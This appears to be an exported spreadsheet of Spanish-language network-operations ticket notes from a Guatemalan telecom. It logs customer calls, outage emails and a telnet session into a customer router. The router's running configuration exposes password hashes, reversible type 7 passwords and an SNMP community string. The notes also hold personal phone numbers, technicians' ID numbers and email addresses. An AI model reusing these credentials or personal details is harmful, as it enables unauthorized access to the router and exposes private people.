    <t>**SE LLAMA A CLIENTE PABLO HERNANDEZ AL  59265779 INDICA QUE AUN SE ENCUENTRA CAIDO EL SERVICIO Y SOLICITA QUE SE LE APOYE PARA UBICAR EL EQUIPO YA QUE HA TENIDO CORTES DE ENERGIA Y POSIBLE QUE EL EQUIPO ESTE INEBIDO || SE NOTIFICA A AGESTOR **
ID 2001964143
**</t>
  </si>
  <si>
    <t>F4582376</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 11:03PARA: JOSUE ALEJANDRO HERRERA SALAZAR &lt;JOSUEA.HERRERA@CLARO.CR&gt;; SERVICEDESKTI &lt;SERVICEDESK@GRUPOMONGE.COM&gt;; TELECOMUNICACIONES@GRUPOMONGE.COM &lt;TELECOMUNICACIONES@GRUPOMONGE.COM&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_GMG_GT_INTERNET_TIENDA_08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2376
ID: 313900300T
IDENTIFICADOR DEL CLIENTE:  CC_GMG_GT_INTERNET_TIENDA_088
UBICADO EN:  LOTE 279 CALLE PRINCIPAL, A LA PAR DE LA DESPENSA FAMILIAR, FRAY BARTOLOME DE LAS CASAS, ALTA VERAPAZ
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4582413</t>
  </si>
  <si>
    <t>SE ENVIA INFORMACION DE TECNICO POR CORREO
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS   PARA PERSONAL TÉCNICO CON RESPECTO AL ENLACE CON 1343190OH  BANCO AZTECA DE HONDURA ADJUNTO DATOS DE PERSONAL TÉCNICO QUE SE ESTARAN TRASLADANDO A SUS INSTALACIONES EN EL HORARIO QUE USTED NOS INDIQUE.
DAVID AGUILAR AMADOR
ID 0801-1991-17499
JUAN CARLOS AGUILAR
ID 0801-1988-16853
QUEDO A LA ESPERA DE SUS COMENTARIOS
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4582512</t>
  </si>
  <si>
    <t>CORRE A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 13:55PARA: TELECOMVPC@ICASA.COM.GT &lt;TELECOMVPC@ICASA.COM.GT&gt;; USCTELECOM@ICASA.COM.GT &lt;USCTELECOM@ICASA.COM.GT&gt;; USCTELECOMUNICACIONES@ICASA.COM.GT &lt;USCTELECOMUNICACIONES@ICASA.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE CAIDO PARA CLIENTE "CC_CERVECERIA_GT_FRAY_BARTOLOME_DE_LAS_CASAS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2512
ID: 86100095T
IDENTIFICADOR DEL CLIENTE:  CC_CERVECERIA_GT_FRAY_BARTOLOME_DE_LAS_CASAS
UBICADO EN:  BARRIO EL CAMPO ZONA 2 FRAY BARTOLOME DE LAS CASAS COBAN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4582535</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: DOMINGO, 29 DE MAYO DE 2022 14:06PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM16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2535
ID: 47501553T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM1649
UBICADO EN:  ATM1649 0 AVENIDA 2-54 ZONA 3 BARRIO ALEGRE JUTIAPA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4582564</t>
  </si>
  <si>
    <t>SE FUERZA TARJETA  EN NODO A 1G EN FIBER 2 Y EN REMOTO A FULL DUPLEX 100 EN PUERTO 3 ENLACE RESTABLECE
&lt;JTPAGTJUN1C1A04A02EIM1&gt;PING -M 10 -B -VPN DISTELSA 10.72.245.116
  PING 10.72.245.116: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!
  --- 10.72.245.116 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
&lt;JTPAGTJUN1C1A04A02EIM1&gt;TELNET VPN DISTELSA 10.72.245.116
TRYING 10.72.245.116 ...
PRESS CTRL+K TO ABORT
CONNECTED TO 10.72.245.116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NE7W0RK$
PASSWORD:
% LOGIN INVALID
USERNAME:
USERNAME: GESTIONIP
PASSWORD:
CC_DISTELSA_GT_JUTIAPA&gt;ENA
PASSWORD:
CC_DISTELSA_GT_JUTIAPA#
CC_DISTELSA_GT_JUTIAPA#SHO I IN TBRIE
                                 ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_DISTELSA_GT_JUTIAPA#SH IP INT BRI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DOWN                  DOWN
LOOPBACK5              10.212.183.47   YES NVRAM  UP                    UP
VLAN1                  192.111.10.250  YES NVRAM  UP                    DOWN
CC_DISTELSA_GT_JUTIAPA#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.245.113           0   B443.2600.E4ED  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.245.116           -   3C51.0E7C.7A00  ARPA   GIGABITETHERNET0/0/0
INTERNET  192.111.10.250          -   3C51.0E7C.7A74  ARPA   VLAN1
CC_DISTELSA_GT_JUTIAPA#SHO IP INT BRIE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DOWN                  DOWN
LOOPBACK5              10.212.183.47   YES NVRAM  UP                    UP
VLAN1                  192.111.10.250  YES NVRAM  UP                    DOWN
CC_DISTELSA_GT_JUTIAPA#SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.245.113           0   B443.2600.E4ED  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.245.116           -   3C51.0E7C.7A00  ARPA   GIGABITETHERNET0/0/0
INTERNET  192.111.10.250          -   3C51.0E7C.7A74  ARPA   VLAN1
CC_DISTELSA_GT_JUTIAPA#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3244 BYTES
!
! LAST CONFIGURATION CHANGE AT 20:13:51 UTC SUN MAY 29 2022
!
VERSION 16.8
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_DISTELSA_GT_JUTIAPA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$.GLG$8V/AYGEOQVWITF8MSF/TL0
ENABLE PASSWORD 7 03246F5C270C751F4A
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
!
!
LICENSE UDI PID C1111-4P SN FGL2346L7RK
NO LICENSE SMART ENABLE
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PASSWORD 7 130B32451C5C16216F
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP RATE
 CLASS CLASS-DEFAULT
  POLICE CIR 10240000 BC 1920000 BE 3840000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DE CLARO
 IP ADDRESS 10.212.183.47 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/61200177T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.72.245.116 255.255.255.240
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
!
INTERFACE GIGABITETHERNET0/1/3
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 10240
 IP ADDRESS 192.111.10.250 255.255.255.0
 SERVICE-POLICY INPUT RATE
 SERVICE-POLICY OUTPUT RATE
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.72.245.113
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION CALLE SEIS DE SEPTIEMBRE 0-32 ZONA 1, JUTIAPA JUTIAP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WSMA AGENT EXEC
!
WSMA AGENT CONFIG
!
WSMA AGENT FILESYS
!
WSMA AGENT NOTIFY
!
!
END
CC_DISTELSA_GT_JUTIAPA#      SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.245.113           0   B443.2600.E4ED  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.245.116           -   3C51.0E7C.7A00  ARPA   GIGABITETHERNET0/0/0
INTERNET  192.111.10.250          -   3C51.0E7C.7A74  ARPA   VLAN1
CC_DISTELSA_GT_JUTIAPA#SHO IP INT BRIE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DOWN                  DOWN
LOOPBACK5              10.212.183.47   YES NVRAM  UP                    UP
VLAN1                  192.111.10.250  YES NVRAM  UP                    DOWN
CC_DISTELSA_GT_JUTIAPA#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9000        19     11000        18         0
  GIGABITETHERNET0/0/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/0          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/3          0         0         0         0         0         0         0         0         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
  VLAN1                         0         0         0         0         0         0         0         0         0
CC_DISTELSA_GT_JUTIAPA#SHO IP INT BRE
                                    ^
% INVALID INPUT DETECTED AT '^' MARKER.
CC_DISTELSA_GT_JUTIAPA#SHO IP INT BRIE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DOWN                  DOWN
LOOPBACK5              10.212.183.47   YES NVRAM  UP                    UP
VLAN1                  192.111.10.250  YES NVRAM  UP                    DOWN
CC_DISTELSA_GT_JUTIAPA#SHO RUN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3244 BYTES
!
! LAST CONFIGURATION CHANGE AT 20:13:51 UTC SUN MAY 29 2022
!
VERSION 16.8
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
PLATFORM QFP UTILIZATION MONITOR LOAD 80
NO PLATFORM PUNT-KEEPALIVE DISABLE-KERNEL-CORE
!
HOSTNAME CC_DISTELSA_GT_JUTIAPA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$.GLG$8V/AYGEOQVWITF8MSF/TL0
ENABLE PASSWORD 7 03246F5C270C751F4A
!
NO AAA NEW-MODEL
!
!
!
!
!
!
!
!
!
!
!
SUBSCRIBER TEMPLATING
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
!
!
!
!
LICENSE UDI PID C1111-4P SN FGL2346L7RK
NO LICENSE SMART ENABLE
!
DIAGNOSTIC BOOTUP LEVEL MINIMAL
!
SPANNING-TREE EXTEND SYSTEM-ID
!
!
USERNAME GESTIONIP PASSWORD 7 130B32451C5C16216F
!
REDUNDANCY
 MODE NONE
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
!
POLICY-MAP RATE
 CLASS CLASS-DEFAULT
  POLICE CIR 10240000 BC 1920000 BE 3840000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DE CLARO
 IP ADDRESS 10.212.183.47 255.255.255.255
!
INTERFACE GIGABITETHERNET0/0/0
 DESCRIPTION WAN PRINCIPAL/_/61200177T/_/
 BANDWIDTH 10240
 IP ADDRESS 10.72.245.116 255.255.255.240
 LOAD-INTERVAL 30
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/0/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 NEGOTIATION AUTO
!
INTERFACE GIGABITETHERNET0/1/0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
!
INTERFACE GIGABITETHERNET0/1/1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
!
INTERFACE GIGABITETHERNET0/1/2
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
!
INTERFACE GIGABITETHERNET0/1/3
 DESCRIPTION LAN DEL CLIENTE
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 10240
 IP ADDRESS 192.111.10.250 255.255.255.0
 SERVICE-POLICY INPUT RATE
 SERVICE-POLICY OUTPUT RATE
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP ROUTE 0.0.0.0 0.0.0.0 10.72.245.113
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION CALLE SEIS DE SEPTIEMBRE 0-32 ZONA 1, JUTIAPA JUTIAP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WSMA AGENT EXEC
!
WSMA AGENT CONFIG
!
WSMA AGENT FILESYS
!
WSMA AGENT NOTIFY
!
!
END
CC_DISTELSA_GT_JUTIAPA#SHO IP INT BRIE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DOWN                  DOWN
LOOPBACK5              10.212.183.47   YES NVRAM  UP                    UP
VLAN1                  192.111.10.250  YES NVRAM  UP                    DOWN
CC_DISTELSA_GT_JUTIAPA#SHO IP INT BRIE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DOWN                  DOWN
LOOPBACK5              10.212.183.47   YES NVRAM  UP                    UP
VLAN1                  192.111.10.250  YES NVRAM  UP                    DOWN
CC_DISTELSA_GT_JUTIAPA#SHO IP INT BRIE
INTERFACE              IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
GIGABITETHERNET0/0/0   10.72.245.116   YES NVRAM  UP                    UP
GIGABITETHERNET0/0/1   UNASSIGNED      YES NVRAM  DOWN                  DOWN
GIGABITETHERNET0/1/0   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/1   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/2   UNASSIGNED      YES UNSET  DOWN                  DOWN
GIGABITETHERNET0/1/3   UNASSIGNED      YES UNSET  UP                    UP
LOOPBACK5              10.212.183.47   YES NVRAM  UP                    UP
VLAN1                  192.111.10.250  YES NVRAM  UP                    UP
CC_DISTELSA_GT_JUTIAPA#      SHO ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.72.245.113           3   B443.2600.E4ED  ARPA   GIGABITETHERNET0/0/0
INTERNET  10.72.245.116           -   3C51.0E7C.7A00  ARPA   GIGABITETHERNET0/0/0
INTERNET  192.111.10.111          0   9C7B.EF32.2D42  ARPA   VLAN1
INTERNET  192.111.10.112          0   9C7B.EF32.2FBA  ARPA   VLAN1
INTERNET  192.111.10.113          0   9C7B.EF32.3041  ARPA   VLAN1
INTERNET  192.111.10.151          0   C074.AD28.E890  ARPA   VLAN1
INTERNET  192.111.10.152          0   C074.AD1A.4DD7  ARPA   VLAN1
INTERNET  192.111.10.153          0   C074.AD28.DB2D  ARPA   VLAN1
INTERNET  192.111.10.202          0   5410.EC23.7E79  ARPA   VLAN1
INTERNET  192.111.10.249          0   ECAD.E076.D1F0  ARPA   VLAN1
INTERNET  192.111.10.250          -   3C51.0E7C.7A74  ARPA   VLAN1
CC_DISTELSA_GT_JUTIAPA#SHO INTE
CC_DISTELSA_GT_JUTIAPA#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773000       207    457000       176         0
  GIGABITETHERNET0/0/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/0          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/1          0         0         0         0         0         0         0         0         0
  GIGABITETHERNET0/1/2          0         0         0         0         0         0         0         0         0
* GIGABITETHERNET0/1/3          0         0         0         0     60000        20    187000        24         0
* LOOPBACK5                     0         0         0         0         0         0         0         0         0
* VLAN1                         0         0         0         0     54000        13     95000        14         0
CC_DISTELSA_GT_JUTIAPA#</t>
  </si>
  <si>
    <t>F4582582</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RIVAI OROZCO AL 77669311 - 47567063  NO RESPONDE || SE INTENTARA LUEGO **
ID 2001979561 - 2001979684
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RIVAI OROZCO AL  47567063 - 77669311  NO RESPONDE ENVIA A BUZON EL PRIMERO NUMERO EN EL SEGUNDO CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001004042 -3001004371
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RIVAI OROZCO 77669311 / 77669312 -47567063  NOSE LOGRA COMUNICACION CON NINGUN NUMERO SE INTENTARA LUEGO **
ID 2001964789 - 2001964849 - 2001964950
**</t>
  </si>
  <si>
    <t>F4582658</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: LUNES, 30 DE MAYO DE 2022 12:26
PARA: CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE MAXI DESPENSA PASEO MANCHEN (21DEOCTUBRE) ID: 1150355
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4582667</t>
  </si>
  <si>
    <t>***--- SE LLAMA A CL CENTRAL  30430559 PARA SOLICITAR CONTACTOS ADICIONALES Y HORARIO PERO NO CONTESTAN -***
2001958778</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN RODRIGUEZ AL 30430559 NO RESPONDE ENVIA A BUZON || SE INTENTARA
LUEGO **
ID 2001965515
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE FARMACIA AL 23314198 / 23314179 EN EL PRIMER NUMERO NO RESPONDEN Y EN EL SEGUNDO CONTESTA EL SEÑOR EDDY QUIEN INFORMA QUE YA ESTA ESTABLE EL SERVICO QUE FUE PROBLEMA DE ENERGIA **
ID 2001965817 - 2001965912
**</t>
  </si>
  <si>
    <t>F4582699</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CRISTAN FARFAN 50002641 RESPONDE YOSI MENCIONA QUE EL ROUTER ESTABA APAGADO
CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001985576 - 2001985878</t>
  </si>
  <si>
    <t>F4582701</t>
  </si>
  <si>
    <t>SE ENVIA CORRREO AL CLIENT, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: LUNES, 30 DE MAYO DE 2022 11:40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901
ESTIMADO CLIENTE,
SOLICITAMOS SU APOYO PARA ENVIAR SUPERVISOR AL CAJERO 1901 Y SE VALIDE LAS CONEXIONES Y EQUIPOS DEL ENLACE PRINCIPAL YA QUE EN NUESTRO MONITOREO NO SE DETECTA NADA CONECTADO.
TICKET: F4582701
ID: 47501616T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1901
UBICADO EN: CAJERO 1901 GASOLINERA PUMA SANARATE, KM.56.5 RUTA AL ATLANTICO SANARATE EL PROGRESO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4582725</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS FUENTES AL 2556-2880 INDICA QUE ESTARA REALIZANDO VALIDACIONES INTERNAS Y SOLICITA QUE SE LE LLAME A LAS 17:30 HRS NUEVAMENTE **
ID 3001038391
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS FUENTES AL 2556-2880 INDICA QUE AUN NO TIENE SERVICIO Y QUE LE URGE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 2001974535
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS FIENTES 25562880 MENCIONA QUE ERA INCONVENIENTE INTERNO
CLIENTE CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001264589</t>
  </si>
  <si>
    <t>F4582780</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL INDICANDO AVANCES ACTUALES --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: LUNES, 30 DE MAYO DE 2022 05:21
PARA: SOPORTE REMOTO &lt;SOPORTE.REMOTO@SARLATAM.COM&gt;
CC: GIOVANI ROLDAN &lt;GIOVANI.ROLDAN@IUNGO.CO&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; VICTOR CHOJOLAN &lt;VICTOR.CHOJOLAN@SARLATAM.COM&gt;; ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; WILLIAM PERUSSINA &lt;WILLIAM.PERUSSINA@IUNGO.CO&gt;
ASUNTO: RE: ENLACE CAÍDO RESTAURANTE EL RANCHO GT101 (ID-727100124)
BUENOS DÍAS ESTIMADO SR. MARIO.
                LAMENTAMOS LOS INCONVENIENTES, PERSONAL TÉCNICO DE CAMPO CONTINUA TRABAJANDO EN EL SITIO DEL DAÑO.
NOS COMENTAN QUE SE PRESENTA DEMORA POR LA LLUVIAS PRESENTADAS POR LA NOCHE EN EL SECTOR, ESPERAMOS NOS INDIQUEN MAYORES AVANCES EN 2 HORAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: SOPORTE REMOTO [MAILTO:SOPORTE.REMOTO@SARLATAM.COM]
ENVIADO EL: LUNES, 30 DE MAYO DE 2022 05:07
PARA: ELVYN ARIEL LOPEZ RECINOS &lt;ELVYN.LOPEZ@CLARO.COM.GT&gt;
CC: GIOVANI ROLDAN &lt;GIOVANI.ROLDAN@IUNGO.CO&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; VICTOR CHOJOLAN &lt;VICTOR.CHOJOLAN@SARLATAM.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; SOPORTE REMOTO &lt;SOPORTE.REMOTO@SARLATAM.COM&gt;; WILLIAM PERUSSINA &lt;WILLIAM.PERUSSINA@IUNGO.CO&gt;
ASUNTO: RE: ENLACE CAÍDO RESTAURANTE EL RANCHO GT101 (ID-727100124)
BUENOS DÍAS, NOS PUEDEN BRINDAR ESTATUS DE ESTE REPORTE, YA QUE EL RESTAURANTE CONTINÚA CON EL ENLACE DE DATOS FUERA DE SERVICIO.
AGRADECEMOS SU PRONTA RESPUESTA.
ATENTAMENTE;</t>
  </si>
  <si>
    <t>F4582811</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RANDY MOLINA AL 4210 4046 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001002219
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE RANDY MOLINA AL 4210 4046 INDICA QUE EL DIA DE AYER HUBO TORMENTA ELECTRICA Y BOTO ALGUNOS FLIPONES Y LA EMPRESA ELECTRICA ESTA TRABAJANDO YA SOLICITA QUE SE LE LLAME EN 45 MIN PARA CONFIRMAR **
ID 2001977717
**</t>
  </si>
  <si>
    <t>F4582842</t>
  </si>
  <si>
    <t>SE LLAMA A 5B PERO CORTAN LLAMADA
ID
3001503790
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:00:31
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 31/05/2022 18:47:50</t>
  </si>
  <si>
    <t>ATIENDE WALTER DE MONITOREO 5B, INFORMA QUE AUN SE TIENEN PROBLEMAS CON EL CONTADOR EN EL PUNTO REMOTO, INDICA QUE NO SE TIENE INFORMACION DE CUANDO SERA REPARADO YA QUE ESTO NO DEPENDE DE ELLOS SINO QUE DE LA EMPRESA ELECTRICA.
ID
1001300956
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:02:58
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: KENNYRIVERA
FECHA Y HORA LOCALES: 4/06/2022 14:33:15</t>
  </si>
  <si>
    <t>SE HABLO CON DANIEL COMENTA QUE FINALIZARON MANTENIMIENTOS PERO ENLACE PRINICPAL CONTINUA DOWN, COMENTA QUE SUPERVISOR VERIFICO CONEXIONES PROCEDIO A AJUSTARLOS SIN EMBARGO ENLACE PRINCIPAL NO HA RESTABLECIDO COMENTA QUE POR LA CANTIDAD DE DIAS QUE YA TIENE LA FALLA SOLICITA VISITA EN CONJUNTO CON PERSONAL DE CLARO.
&lt;RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:15
FIN: HOY, 18:24
DURACIÓN: 8:45
ID DE LLAMADA: 2001102276</t>
  </si>
  <si>
    <t>SE HA LLAMADO A MONITOREO 5B PARA SOLICITAR AVANCES SOBRE LAS REPARACIONES EN EL CONTADOR HECTOR INDICA QUE SUPERVISOR SE ENCUENTRA EN PUNTO REMOTO QUE SE LLAME MAS TARDE PARA QUE INDIQUEN HALLAZGOS.
2001047018
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:01:43
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 8/06/2022 14:52:37
 DESDE NMIS SE OBSERVA OPERATIVO ATM ESTO VIA ENLACE REDUNDANTE
NODE DETAILS - CC_TYT_GT_ATM_4935 - SSH TO NODE
NODE STATUS 	REACHABLE
SYSTEM NAME 	CC_TYT_GT_ATM_4935
IP ADDRESS 	10.212.190.121
COUNTRY 	GUATEMALA
PROPERTY 	CUSTOMER
GROUP 	CC_TYT_VIP
CUSTOMER 	OPMANTEK
LOCATION 	SANTA ROSA
BUSINESS SERVICE 	
SERVICE STATUS 	PRODUCTION
TYPE 	ROUTER
MODEL 	TELDATROUTER
UPTIME 	22:13:38
ENLACE PRINCIPAL CAIDO, ACTIVO POR REDUNDANCIA
